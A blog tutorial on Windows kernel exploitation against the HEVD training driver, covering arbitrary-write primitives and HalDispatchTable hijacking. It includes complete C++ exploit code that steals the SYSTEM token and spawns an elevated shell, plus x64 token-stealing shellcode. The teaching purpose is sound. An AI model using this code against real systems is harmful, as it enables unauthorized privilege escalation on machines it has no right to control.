Windows Kernel Exploitation - Part Three

Arbitrary Overwrite, kCFG, and SMEP

Posted Jun 14, 2026

97 min read

From Stack Smashing to Kernel Housekeeping

In the last post, we took the classic route: finding a stack buffer overflow, controlling RIP, dealing with SMEP, and eventually ROPing our way into shellcode execution. That was a good starting point because it showed how a simple memory corruption bug can turn into code execution in kernel mode. But kernel exploitation is not always about smashing the stack and jumping to shellcode. Sometimes the real goal is to build a useful primitive: the ability to write to kernel memory, reuse freed objects, confuse object layouts, or influence how the kernel interprets our data. In this post, we’ll continue working with HEVD and look at Arbitrary Overwrite. The goal is not just to crash the VM again, although we probably will, but to understand what the bug gives us as an attacker and how that primitive maps to real-world driver exploitation.

Write-What-Where: The Kernel’s Worst Customer Service Feature

IDA, Tell Me Where It Hurts

We start with Arbitrary Write, better known as Write-What-Where. The name will make sense in a short while. Because we’re working with HEVD, the driver conveniently labels each vulnerability we can work with. Looking at it in IDA, we can see that the IOCTL code we need is 0x22200B.

We can follow this sub function and find the pseudo code for this vulnerability.

We can make some changes for it to be more readable. The last line will become

  
*Where = *What;

This function expects the user to pass a small structure containing two pointers: What and Where. The What field points to the value that should be copied, and the Where field points to the destination where that value should be written. The problem is that both of these pointers are user controlled. The driver only probes the outer structure, then blindly dereferences the inner pointers and performs *Where = *What. Because this code runs in kernel mode, this becomes an arbitrary kernel write primitive.

The 0x10 value comes from the size of the input structure expected by this IOCTL. The structure contains two 64-bit pointers: What and Where. Since each pointer is 8 bytes on x64, the full structure is 16 bytes, or 0x10. The ProbeForRead() call is supposed to make sure the user-mode pointer passed to the driver is readable before the kernel dereferences it. This kind of validation is common in legitimate drivers, especially when using IOCTLs that receive user-controlled input. A driver may need to receive a structure from user mode describing an operation, a buffer, a configuration value, or a request to perform some device-specific action. The bug is not that the driver receives a structure from user mode. That part is normal. The bug is that the driver trusts the pointers inside that structure. ProbeForRead() only checks that the 16-byte WRITE_WHAT_WHERE structure is readable. It does not prove that What is a safe address to read from, and it definitely does not prove that Where is a safe address to write to. Since both pointers are fully controlled by the caller, the final assignment *Where = *What gives user mode the ability to write an arbitrary 8-byte value to an arbitrary address from kernel mode. This vulnerability is basically the driver saying, “Sure, I’ll write whatever you want, wherever you want — what could possibly go wrong?”
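The size arithmetic and the copy itself can be modelled in ordinary user-mode code. What follows is a minimal sketch, not HEVD’s source: `WriteWhatWhereRequest` and `simulate_handler` are hypothetical names I made up for illustration, and the `static_assert` assumes a 64-bit build where each pointer is 8 bytes.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical user-mode model of the request structure: two 64-bit pointers.
struct WriteWhatWhereRequest {
    std::uint64_t* What;   // address the value is read from
    std::uint64_t* Where;  // address the value is written to
};

// On a 64-bit build the structure is 2 * 8 = 16 bytes, i.e. 0x10.
static_assert(sizeof(WriteWhatWhereRequest) == 0x10, "assumes 64-bit pointers");

// Models the vulnerable copy: the inner pointers are used without any validation.
inline void simulate_handler(const WriteWhatWhereRequest& req) {
    *req.Where = *req.What;
}
```

Probing the outer structure only answers “can I read these 16 bytes?”. It says nothing about the two addresses stored inside them, and those are the ones that get dereferenced.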

The Dangerous Art of “Put This There”

I’ll be reusing the exploit code from the previous post. It becomes:

  
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <Psapi.h>
#include <stdlib.h>

#define QWORD ULONGLONG

// Defining the IOCTL and the DeviceName
#define HEVD_IOCTL_ARBITRARY_WRITE 0x22200B
#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

// Defining a struct
typedef struct _WRITE_WHAT_WHERE
{
    QWORD* What;
    QWORD* Where;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

int main()
{
    printf("[+] Opening %ls\n", DEVICE_NAME);

    // Creating a handle
    HANDLE hDevice = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        nullptr,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        nullptr
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFileW failed. Error=%lu\n", GetLastError());
        return 1;
    }

    QWORD whatValue = 0x4141414141414141ULL;
    QWORD whereValue = 0x4242424242424242ULL;

    WRITE_WHAT_WHERE request = { 0 };

    request.What = &whatValue;
    request.Where = &whereValue;

    printf("[+] What pointer:        0x%p\n", request.What);
    printf("[+] Where pointer:       0x%p\n", request.Where);

    printf("[+] *What Contains:        0x%llx\n", whatValue);
    printf("[+] *Where Contains:       0x%llx\n", whereValue);

    // Pause before the IOCTL so the structures can be inspected in the debugger
    printf("[+] Press Enter to send the IOCTL...\n");
    getchar();

    printf("[+] Sending vulnerable IOCTL: 0x%X for ARBITRARY_WRITE\n", HEVD_IOCTL_ARBITRARY_WRITE);

    DWORD bytesReturned = 0;

    BOOL ok = DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        nullptr,
        0,
        &bytesReturned,
        nullptr
    );

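    if (!ok)
    {
        printf("[-] DeviceIoControl failed. Error=%lu\n", GetLastError());
    }
    else
    {
        printf("[+] DeviceIoControl returned successfully\n");
        // The driver performed *Where = *What, so whereValue should now equal whatValue
        printf("[+] *Where Contains now:   0x%llx\n", whereValue);
    }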

    CloseHandle(hDevice);

    return 0;
}

This is a safe way to confirm the arbitrary overwrite behavior without touching sensitive kernel memory. The code opens a handle to the HEVD device and builds a WRITE_WHAT_WHERE structure containing two pointers: What points to a user-mode variable holding 0x4141414141414141, and Where points to another user-mode variable initially holding 0x4242424242424242. When the IOCTL is sent, the vulnerable driver receives this 16-byte structure and performs the dangerous operation *Where = *What. Since both pointers are controlled by us, the driver copies the value from the What address into the Where address. After DeviceIoControl() returns, the destination value changes from 0x4242424242424242 to 0x4141414141414141, proving that the driver gave us a working write-what-where primitive. In this first test, both addresses are harmless user-mode variables, but the same primitive becomes dangerous when Where is changed to a meaningful kernel address. We’ve added in getchar() so we can pause execution and look over the structures. When the execution pauses, we can look over at the values to see if our values populated the pointers.

0: kd> dq 0x000000C5080FFE28 L1
000000c5`080ffe28  41414141`41414141
0: kd> dq 0x000000C5080FFE30 L1
000000c5`080ffe30  42424242`42424242

The two variables hold the values we supplied, so the request structure points at the data we expect. That’s great. A point to note is that the roles can also be reversed. Right now we hand the driver a user-mode value and a destination to write it to. If we instead point What at a kernel address and Where at a user-mode variable we control, the same primitive copies kernel data out to us, which turns the arbitrary write into an arbitrary read.

No ROP, No Shellcode, Just Vibes

This can be done with two functions, one for read and one for write. The read function takes our device handle and a kernel address to read from, while the write function takes the kernel address to write to and the value we want to write.

  
QWORD ReadQWORD(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD value = 0;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        (QWORD*)kernelAddress,
        &value
    );

    if (!ok)
    {
        printf("[-] ReadQWORD failed at 0x%llx. Error=%lu\n", kernelAddress, GetLastError());
    }

    return value;
}

BOOL WriteQWORD(HANDLE hDevice, QWORD kernelAddress, QWORD valueToWrite)
{
    QWORD value = valueToWrite;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        &value,
        (QWORD*)kernelAddress
    );

    if (!ok)
    {
        printf("[-] WriteQWORD failed at 0x%llx. Error=%lu\n", kernelAddress, GetLastError());
    }

    return ok;
}

Both helpers are thin wrappers around a single function that triggers the primitive. They simply swap which side is the kernel address: for a read it is passed as What, and for a write it is passed as Where.

  
BOOL TriggerWriteWhatWhere(HANDLE hDevice, QWORD* what, QWORD* where)
{
    WRITE_WHAT_WHERE request = { 0 };

    request.What = what;
    request.Where = where;

    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
}

This is the point where the vulnerability becomes more useful. We now have a tiny kernel memory API built out of a bug. ReadQWORD() lets us inspect kernel structures, and WriteQWORD() lets us modify them. From here, we can locate PsInitialSystemProcess, walk the ActiveProcessLinks list, find our own process, and overwrite its token with the SYSTEM token. At this point the driver has accidentally become a very cursed version of memcpy-as-a-service. I’ll reuse my previous code to find the NT base address:

  
QWORD getBaseAddr(LPCWSTR driverName)
{
    LPVOID drivers[1024];
    DWORD cbNeeded = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded))
    {
        printf("[!] EnumDeviceDrivers failed: %lu\n", GetLastError());
        return 0;
    }

    int driverCount = cbNeeded / sizeof(drivers[0]);

    for (int i = 0; i < driverCount; i++)
    {
        WCHAR currentDriverName[MAX_PATH];

        if (GetDeviceDriverBaseNameW(
            drivers[i],
            currentDriverName,
            MAX_PATH
        ))
        {
            if (_wcsicmp(currentDriverName, driverName) == 0)
            {
                return (QWORD)drivers[i];
            }
        }
    }

    printf("[!] Could not find driver: %ws\n", driverName);
    return 0;
}

And we can get it the same as before

  
QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");

if (!ntBase)
{
    printf("[-] Failed to get ntoskrnl.exe base address\n");
    CloseHandle(hDevice);
    return 1;
}

printf("[+] ntoskrnl.exe base:                  0x%llx\n", ntBase);

From here on, we can start building our token stealing payload without needing kernel code execution at all. The thought process is this:

Use arbitrary write as arbitrary read/write.
Find SYSTEM EPROCESS.
Read SYSTEM token.
Find your current process EPROCESS.
Overwrite your process Token field.
Spawn cmd.exe.

How does this happen? Well, we’re going to need a few offsets. Since the goal is to copy the SYSTEM token into our current process, we first need the offsets of UniqueProcessId, ActiveProcessLinks, and Token within the _EPROCESS structure. WinDbg gives us these directly:

0: kd> dt nt!_EPROCESS UniqueProcessId ActiveProcessLinks Token
   +0x440 UniqueProcessId    : Ptr64 Void
   +0x448 ActiveProcessLinks : _LIST_ENTRY
   +0x4b8 Token              : _EX_FAST_REF
0: kd> ? nt!PsInitialSystemProcess - nt
Evaluate expression: 13616160 = 00000000`00cfc420
0: kd> dq nt!PsInitialSystemProcess L1
fffff801`50afc420  ffffb68f`3887d040

This gives us the following offsets for this Windows build:

EPROCESS + 0x440 = UniqueProcessId
EPROCESS + 0x448 = ActiveProcessLinks
EPROCESS + 0x4b8 = Token

We will use UniqueProcessId to identify our own process while walking the process list. ActiveProcessLinks lets us move from one _EPROCESS object to the next. Once we find the process whose PID matches our exploit process, we can overwrite its Token field with the token from the SYSTEM process.

Next, we need a reliable way to find the SYSTEM process. Windows exposes a kernel global variable called PsInitialSystemProcess, which points to the _EPROCESS structure for the SYSTEM process. Because of KASLR, we do not want to hardcode the full runtime address. Instead, we calculate its offset from the base of ntoskrnl.exe:

0: kd> ? nt!PsInitialSystemProcess - nt
Evaluate expression: 13616160 = 00000000`00cfc420

So in the exploit, we can define:

#define PS_INITIAL_SYSTEM_PROCESS_OFFSET 0x00cfc420ULL

Then at runtime:

QWORD psInitialSystemProcessAddress = ntBase + PS_INITIAL_SYSTEM_PROCESS_OFFSET;
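As a quick sanity check of that arithmetic, here is a small sketch using the numbers from the WinDbg session in this post. The helper names are mine, and the image base used in the note below is derived by subtraction rather than taken from the debugger output, so treat it as an assumption about that particular boot.

```cpp
#include <cassert>
#include <cstdint>

// Offset of nt!PsInitialSystemProcess from the image base on this build
// (from "? nt!PsInitialSystemProcess - nt"); it changes between builds.
constexpr std::uint64_t kPsInitialSystemProcessOffset = 0x00cfc420ULL;

// Runtime address = randomized image base + build-specific offset.
constexpr std::uint64_t resolve_symbol(std::uint64_t imageBase, std::uint64_t offset) {
    return imageBase + offset;
}

// Inverse direction: recover the image base from a known symbol address.
constexpr std::uint64_t base_from_symbol(std::uint64_t symbolAddress, std::uint64_t offset) {
    return symbolAddress - offset;
}
```

With the symbol at fffff801`50afc420, `base_from_symbol` gives fffff801`4fe00000 for that boot. After a reboot the base moves, but the offset stays the same as long as the kernel build does not change.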

Finally, this command shows the actual value stored at PsInitialSystemProcess:

0: kd> dq nt!PsInitialSystemProcess L1
fffff801`50afc420  ffffb68f`3887d040

This means:

PsInitialSystemProcess address = fffff801`50afc420
Value stored there             = ffffb68f`3887d040

That stored value is the address of the SYSTEM process’s _EPROCESS structure. In code, we read it like this:

  
QWORD systemEprocess = ReadQWORD(hDevice, psInitialSystemProcessAddress);

From there, the exploit reads:

  
QWORD systemToken = ReadQWORD(hDevice, systemEprocess + TOKEN_OFFSET);

Then it walks the ActiveProcessLinks list until it finds the current process PID:

  
QWORD pid = ReadQWORD(hDevice, current + UNIQUE_PROCESS_ID_OFFSET);
QWORD flink = ReadQWORD(hDevice, current + ACTIVE_PROCESS_LINKS_OFFSET);
current = flink - ACTIVE_PROCESS_LINKS_OFFSET;

This happens in a loop that looks like this:

  
for (int i = 0; i < 1024; i++)
{
    QWORD pid = ReadQWORD(hDevice, current + UNIQUE_PROCESS_ID_OFFSET);

    if ((DWORD)pid == currentPid)
    {
        currentEprocess = current;
        break;
    }

    QWORD flink = ReadQWORD(hDevice, current + ACTIVE_PROCESS_LINKS_OFFSET);

    if (!flink)
    {
        printf("[-] ActiveProcessLinks Flink is NULL\n");
        CloseHandle(hDevice);
        return 1;
    }

    current = flink - ACTIVE_PROCESS_LINKS_OFFSET;
}

if (!currentEprocess)
{
    printf("[-] Failed to find current process EPROCESS\n");
    CloseHandle(hDevice);
    return 1;
}
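The part of this loop that trips people up is the subtraction: Flink points at the next entry’s ActiveProcessLinks field, not at the start of the next _EPROCESS. A minimal user-mode sketch of the same walk, assuming made-up `ListEntry` and `FakeProcess` types that only imitate the real layout:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical stand-ins for LIST_ENTRY and a tiny slice of _EPROCESS.
struct ListEntry {
    ListEntry* Flink;
    ListEntry* Blink;
};

struct FakeProcess {
    std::uint64_t UniqueProcessId;
    ListEntry     ActiveProcessLinks;
    std::uint64_t Token;
};

// Walk the circular list from `start` and return the record whose PID matches.
inline FakeProcess* find_process(FakeProcess* start, std::uint64_t pid, int maxSteps = 1024) {
    FakeProcess* current = start;
    for (int i = 0; i < maxSteps; i++) {
        if (current->UniqueProcessId == pid) {
            return current;
        }
        // Flink targets the embedded list field, so subtract the field offset
        // to get back to the start of the containing record.
        auto* linkBytes = reinterpret_cast<unsigned char*>(current->ActiveProcessLinks.Flink);
        current = reinterpret_cast<FakeProcess*>(linkBytes - offsetof(FakeProcess, ActiveProcessLinks));
    }
    return nullptr; // not found within the step budget
}

// Helper for the example: link an array of records into a circular list.
inline void link_circular(FakeProcess* procs, std::size_t count) {
    for (std::size_t i = 0; i < count; i++) {
        std::size_t next = (i + 1) % count;
        procs[i].ActiveProcessLinks.Flink = &procs[next].ActiveProcessLinks;
        procs[next].ActiveProcessLinks.Blink = &procs[i].ActiveProcessLinks;
    }
}
```

One difference from the real thing: in the kernel, one link in the circle belongs to the list head rather than to a process, so the exploit loop briefly treats the head as if it were an _EPROCESS. The step budget keeps the walk bounded if the PID never turns up.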

Once the current process is found, the final write is simply:

  
WriteQWORD(hDevice, currentEprocess + TOKEN_OFFSET, finalToken);
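The finalToken value deserves a word. Token is an _EX_FAST_REF, which on x64 keeps a small reference count in the low 4 bits of the pointer. The sketch below shows the masking on plain integers. The function names are hypothetical and the sample values in the note are invented, not read from my VM.

```cpp
#include <cassert>
#include <cstdint>

// On x64 the low 4 bits of an _EX_FAST_REF hold a cached reference count;
// the remaining bits are the 16-byte-aligned object pointer.
constexpr std::uint64_t kFastRefMask = 0xFULL;

constexpr std::uint64_t fast_ref_pointer(std::uint64_t fastRef) {
    return fastRef & ~kFastRefMask;
}

constexpr std::uint64_t fast_ref_count(std::uint64_t fastRef) {
    return fastRef & kFastRefMask;
}

// Value to store in our Token field: SYSTEM's token pointer plus our own ref bits.
constexpr std::uint64_t build_final_token(std::uint64_t systemToken, std::uint64_t currentToken) {
    return fast_ref_pointer(systemToken) | fast_ref_count(currentToken);
}
```

For example, a SYSTEM token value of 0xffffa30f1a2b3c47 and a current token value of 0xffffa30f5d6e7f8b combine into 0xffffa30f1a2b3c4b: SYSTEM’s pointer with our original low bits.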

The entire thing put together looks like this

  
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
#include <stdlib.h>

#pragma comment(lib, "Psapi.lib")

#define QWORD ULONGLONG

// Defining the IOCTL and the DeviceName
#define HEVD_IOCTL_ARBITRARY_WRITE 0x22200B
#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

// Offsets for EPROCESS structure
// dt nt!_EPROCESS UniqueProcessId ActiveProcessLinks Token
#define UNIQUE_PROCESS_ID_OFFSET 0x440ULL
#define ACTIVE_PROCESS_LINKS_OFFSET 0x448ULL
#define TOKEN_OFFSET 0x4b8ULL

// ? nt!PsInitialSystemProcess - nt
#define PS_INITIAL_SYSTEM_PROCESS_OFFSET 0x00cfc420ULL

// Defining a struct
typedef struct _WRITE_WHAT_WHERE
{
    QWORD* What;
    QWORD* Where;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

BOOL TriggerWriteWhatWhere(HANDLE hDevice, QWORD* what, QWORD* where)
{
    WRITE_WHAT_WHERE request = { 0 };

    request.What = what;
    request.Where = where;

    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
}

QWORD ReadQWORD(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD value = 0;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        (QWORD*)kernelAddress,
        &value
    );

    if (!ok)
    {
        printf("[-] ReadQWORD failed at 0x%llx. Error=%lu\n", kernelAddress, GetLastError());
    }

    return value;
}

BOOL WriteQWORD(HANDLE hDevice, QWORD kernelAddress, QWORD valueToWrite)
{
    QWORD value = valueToWrite;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        &value,
        (QWORD*)kernelAddress
    );

    if (!ok)
    {
        printf("[-] WriteQWORD failed at 0x%llx. Error=%lu\n", kernelAddress, GetLastError());
    }

    return ok;
}

// Finding NT Base address
QWORD getBaseAddr(LPCWSTR driverName)
{
    LPVOID drivers[1024];
    DWORD cbNeeded = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded))
    {
        printf("[!] EnumDeviceDrivers failed: %lu\n", GetLastError());
        return 0;
    }

    int driverCount = cbNeeded / sizeof(drivers[0]);

    for (int i = 0; i < driverCount; i++)
    {
        WCHAR currentDriverName[MAX_PATH];

        if (GetDeviceDriverBaseNameW(
            drivers[i],
            currentDriverName,
            MAX_PATH
        ))
        {
            if (_wcsicmp(currentDriverName, driverName) == 0)
            {
                return (QWORD)drivers[i];
            }
        }
    }

    printf("[!] Could not find driver: %ws\n", driverName);
    return 0;
}

int main()
{
    printf("[+] Opening %ls\n", DEVICE_NAME);

    // Creating a handle
    HANDLE hDevice = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        nullptr,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        nullptr
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFileW failed. Error=%lu\n", GetLastError());
        return 1;
    }

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");

    if (!ntBase)
    {
        printf("[-] Failed to get ntoskrnl.exe base address\n");
        CloseHandle(hDevice);
        return 1;
    }

    printf("[+] ntoskrnl.exe base:                  0x%llx\n", ntBase);

    QWORD psInitialSystemProcessAddress = ntBase + PS_INITIAL_SYSTEM_PROCESS_OFFSET;

    printf("[+] PsInitialSystemProcess address:     0x%llx\n", psInitialSystemProcessAddress);

    QWORD systemEprocess = ReadQWORD(hDevice, psInitialSystemProcessAddress);

    if (!systemEprocess)
    {
        printf("[-] Failed to read SYSTEM EPROCESS\n");
        CloseHandle(hDevice);
        return 1;
    }

    printf("[+] SYSTEM EPROCESS:                    0x%llx\n", systemEprocess);

    QWORD systemToken = ReadQWORD(hDevice, systemEprocess + TOKEN_OFFSET);
    QWORD cleanSystemToken = systemToken & ~0xFULL;

    printf("[+] SYSTEM Token:                       0x%llx\n", systemToken);
    printf("[+] SYSTEM Token cleaned:               0x%llx\n", cleanSystemToken);

    DWORD currentPid = GetCurrentProcessId();

    printf("[+] Current PID:                        %lu\n", currentPid);

    QWORD currentEprocess = 0;
    QWORD current = systemEprocess;

    for (int i = 0; i < 1024; i++)
    {
        QWORD pid = ReadQWORD(hDevice, current + UNIQUE_PROCESS_ID_OFFSET);

        if ((DWORD)pid == currentPid)
        {
            currentEprocess = current;
            break;
        }

        QWORD flink = ReadQWORD(hDevice, current + ACTIVE_PROCESS_LINKS_OFFSET);

        if (!flink)
        {
            printf("[-] ActiveProcessLinks Flink is NULL\n");
            CloseHandle(hDevice);
            return 1;
        }

        current = flink - ACTIVE_PROCESS_LINKS_OFFSET;
    }

    if (!currentEprocess)
    {
        printf("[-] Failed to find current process EPROCESS\n");
        CloseHandle(hDevice);
        return 1;
    }

    printf("[+] Current EPROCESS:                   0x%llx\n", currentEprocess);

    QWORD currentTokenAddress = currentEprocess + TOKEN_OFFSET;
    QWORD currentToken = ReadQWORD(hDevice, currentTokenAddress);

    printf("[+] Current Token address:              0x%llx\n", currentTokenAddress);
    printf("[+] Current Token before:               0x%llx\n", currentToken);

    QWORD currentTokenRefBits = currentToken & 0xFULL;
    QWORD finalToken = cleanSystemToken | currentTokenRefBits;

    printf("[+] Current Token ref bits:             0x%llx\n", currentTokenRefBits);
    printf("[+] Final token to write:               0x%llx\n", finalToken);

    if (!WriteQWORD(hDevice, currentTokenAddress, finalToken))
    {
        printf("[-] Failed to overwrite current process token\n");
        CloseHandle(hDevice);
        return 1;
    }

    QWORD verifyToken = ReadQWORD(hDevice, currentTokenAddress);

    printf("[+] Current Token after:                0x%llx\n", verifyToken);

    if ((verifyToken & ~0xFULL) == cleanSystemToken)
    {
        printf("[+] Token overwrite successful\n");
        printf("[+] Spawning cmd.exe\n");
        system("cmd.exe");
    }
    else
    {
        printf("[-] Token overwrite verification failed\n");
    }

    CloseHandle(hDevice);
    return 0;
}

Run this and we get elevated privileges

Fine, Let’s Make It Loud

The previous method was quiet and elegant: no shellcode, no ROP, no direct code execution. We simply used the arbitrary write primitive to modify our process token and become SYSTEM. But arbitrary overwrite can also be abused in a louder way. Instead of only modifying kernel data, we can use the primitive to make our user-mode shellcode executable from kernel mode, redirect execution through a kernel callback path, and turn the bug into full kernel code execution. This is where things get more painful, more fragile, and significantly more likely to make WinDbg your emotional support animal.

HalDispatchTable: Windows Callback Roulette

At this point, our arbitrary overwrite gives us a very dangerous primitive: we can write a value of our choice to a kernel address of our choice. But that still leaves us with an important question: where do we write?

A write primitive does not magically give us code execution. It only lets us corrupt memory. To turn that corruption into execution, we need to overwrite something that the kernel will later treat as a control flow target. In other words, we need the kernel to eventually load our corrupted value and call or jump to it.

This is where the classic HalDispatchTable technique comes in.

HalDispatchTable is an internal kernel dispatch table related to the Windows Hardware Abstraction Layer. The HAL exists so Windows can interact with hardware-specific functionality through a common interface instead of hardcoding every hardware detail directly into the kernel. Some HAL-related operations are reached through function pointers stored in dispatch tables. A function pointer is simply an address that says, “when this operation is needed, call the function located here.”

Normally, entries inside HalDispatchTable point to legitimate HAL routines. The kernel follows those pointers during specific system operations, calls the correct HAL routine, receives the result, and continues as normal.

The exploitation idea is simple: if we can overwrite one of those function pointers, we can make the kernel call an address of our choosing.

So instead of this:

Kernel path -> HalDispatchTable entry -> legitimate HAL routine

we try to create this:

Kernel path -> HalDispatchTable entry -> attacker-controlled payload

The table itself is not the vulnerability. The vulnerability is still the arbitrary overwrite in the driver. HalDispatchTable is just the target we abuse after we already have that write primitive. It acts as a bridge between “I can write to kernel memory” and “I can redirect kernel execution.”

Historically, the common trigger for this technique was NtQueryIntervalProfile. From user mode, an exploit could call this native API. The call would transition into the kernel, pass through the kernel’s profile query handling path, and eventually reach a HAL dispatch routine through HalDispatchTable. If the relevant table entry had been overwritten, the kernel would indirectly call the attacker controlled address instead of the original HAL function.

This and so much more is beautifully explained here: https://connormcgarr.github.io/Kernel-Exploitation-2/. This dude is a genius.

The flow looks like this:

User mode
    |
    | call NtQueryIntervalProfile()
    v
Kernel mode
    |
    | profile query handling
    v
Read function pointer from HalDispatchTable
    |
    | indirect call
    v
Execution reaches overwritten pointer
    |
    v
Kernel payload runs

This is why the technique became so famous in older Windows kernel exploitation. It gave exploit writers a predictable place to aim an arbitrary write and a predictable way to trigger the corrupted pointer afterward.

However, there are a few important details that make or break the exploit.

First, the original function pointer should be saved before overwriting it. HalDispatchTable is part of the operating system’s normal kernel machinery. If we corrupt it and leave it corrupted, the machine can crash when the same path is used again. A clean exploit should restore the original pointer after the payload has executed.

Second, the payload address must be executable from kernel mode. On old systems, attackers often pointed the table entry directly at shellcode sitting in user mode memory. On modern systems, SMEP breaks that approach because the CPU prevents supervisor mode code from executing instructions from user pages. That means the exploit needs an additional bypass or a different payload placement strategy.

Third, this technique is noisy and fragile on modern x64 Windows. Kernel Patch Protection, KASLR, Kernel CFG, HVCI, and other mitigations make global kernel function pointer overwrites much less reliable than they were in older writeups. PatchGuard may notice protected kernel structures being modified. KASLR means addresses must be resolved dynamically. Kernel CFG may validate indirect calls. HVCI can restrict writable/executable kernel memory behavior.

So the main lesson is not “HalDispatchTable is the best modern exploitation method.” The real lesson is that HalDispatchTable shows a classic exploitation pattern:

Find a trusted kernel function pointer.
Overwrite it using a memory corruption primitive.
Trigger a legitimate kernel path that calls it.
Use that call to gain kernel execution.
Restore state before the system falls over.
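The pattern above is easier to see in a toy. This sketch has nothing to do with the real kernel: `DispatchTable`, `trigger`, and `hijack_once` are hypothetical names, everything runs in one user-mode process, and the “payload” just multiplies a number.

```cpp
#include <cassert>

using DispatchRoutine = int (*)(int);

// Hypothetical routines standing in for a legitimate handler and a replacement.
inline int legitimate_routine(int x) { return x + 1; }
inline int injected_routine(int x)   { return x * 100; }

// Hypothetical two-slot table standing in for a kernel dispatch table.
struct DispatchTable {
    DispatchRoutine entries[2];
};

// The "legitimate path": it trusts whatever pointer currently sits in slot 1.
inline int trigger(const DispatchTable& table, int arg) {
    return table.entries[1](arg);
}

// Save slot 1, overwrite it, trigger it once, then put the original back.
inline int hijack_once(DispatchTable& table, DispatchRoutine replacement, int arg) {
    DispatchRoutine original = table.entries[1]; // save
    table.entries[1] = replacement;              // overwrite
    int result = trigger(table, arg);            // trigger
    table.entries[1] = original;                 // restore
    return result;
}
```

The caller of `trigger` never changes. Only the data it trusts does, which is why a pure write primitive is enough to redirect control flow, and why restoring the slot matters for every later caller.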

In our exploit journey, this technique is useful because it teaches how arbitrary write can become code execution. The vulnerable driver gives us the write. HalDispatchTable gives us the control flow target. The trigger path gives us the call. After that, the kernel payload performs the familiar token stealing step to turn the current process into SYSTEM. In other words: the vulnerable driver gives us the pen, HalDispatchTable gives us the signature line, and NtQueryIntervalProfile makes Windows unknowingly sign the cheque.

Building the Exploit

For now, I’m working with a Windows 10 VM with SMEP disabled.

The same token stealing payload can be reused because the actual privilege escalation logic does not depend on the original vulnerability. Whether execution is gained through a stack overflow, a corrupted dispatch table, or some other control flow hijack, the payload still needs to locate the current process, find the SYSTEM process, copy the SYSTEM token, and replace the current process token. What changes is the wrapper around the payload. In the stack overflow exploit, the shellcode had to survive a corrupted stack frame. In the HalDispatchTable technique, the payload is reached through a kernel function pointer call, so it should behave more like a normal called function: save registers, perform the token swap, restore state, and return cleanly.

We do still need to clean up, but far less than in the stack overflow exploit, where the shellcode had to recover from a smashed control-flow path and manually return to user mode. Here the caller’s stack is intact, so once the registers are restored a plain ret hands control back to the kernel caller.

  
[BITS 64]

_start:
    ; Save state.
    pushfq
    push rbx
    push rcx
    push rdx
    push rsi
    push rdi
    push rbp
    push r8
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push r15

    ; Get current _EPROCESS
    mov rax, [gs:0x188]          ; Current _KTHREAD
    mov rax, [rax + 0xb8]        ; Current _EPROCESS
    mov rbx, rax                 ; Save current _EPROCESS in RBX

    ; Start walking ActiveProcessLinks
    mov r12, rax

find_system:
    mov r12, [r12 + 0x448]       ; Flink: next ActiveProcessLinks
    sub r12, 0x448               ; Back to containing _EPROCESS

    mov r13, [r12 + 0x440]       ; UniqueProcessId
    cmp r13, 4                   ; PID 4 == SYSTEM
    jne find_system

steal_token:
    mov r13, [r12 + 0x4b8]       ; SYSTEM Token
    and r13, 0xfffffffffffffff0  ; Clear SYSTEM token ref-count bits

    mov r14, [rbx + 0x4b8]       ; Current process Token
    and r14, 0xf                 ; Preserve current token ref-count bits

    or r13, r14                  ; Final token = clean SYSTEM token + current ref bits
    mov [rbx + 0x4b8], r13       ; Replace current process token

done:
    ; Restore state
    pop r15
    pop r14
    pop r13
    pop r12
    pop r11
    pop r10
    pop r9
    pop r8
    pop rbp
    pop rdi
    pop rsi
    pop rdx
    pop rcx
    pop rbx
    popfq

    ; Return success-ish value.
    mov eax, 0

    ; Return to the original kernel caller
    ret

For the first HalDispatchTable version, we keep the lab simple and place the payload in user-mode executable memory. This keeps the exploit flow easy to understand: the arbitrary write corrupts the dispatch table, and the trigger redirects kernel execution to our payload. This only works when SMEP is disabled. Once SMEP is enabled, the same idea needs an additional bypass because the kernel can no longer execute code from user mode pages.
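Whether SMEP is on can be read straight out of CR4, where bit 20 is the SMEP enable flag. A tiny sketch for decoding a CR4 value, for instance one copied from the debugger’s register view. The helper name is hypothetical and the values in the note are illustrative, not taken from my VM.

```cpp
#include <cassert>
#include <cstdint>

// CR4 bit 20 is the SMEP enable flag on x86-64.
constexpr std::uint64_t kCr4SmepBit = 1ULL << 20;

// Returns true when the given CR4 value has SMEP enabled.
constexpr bool smep_enabled(std::uint64_t cr4) {
    return (cr4 & kCr4SmepBit) != 0;
}
```

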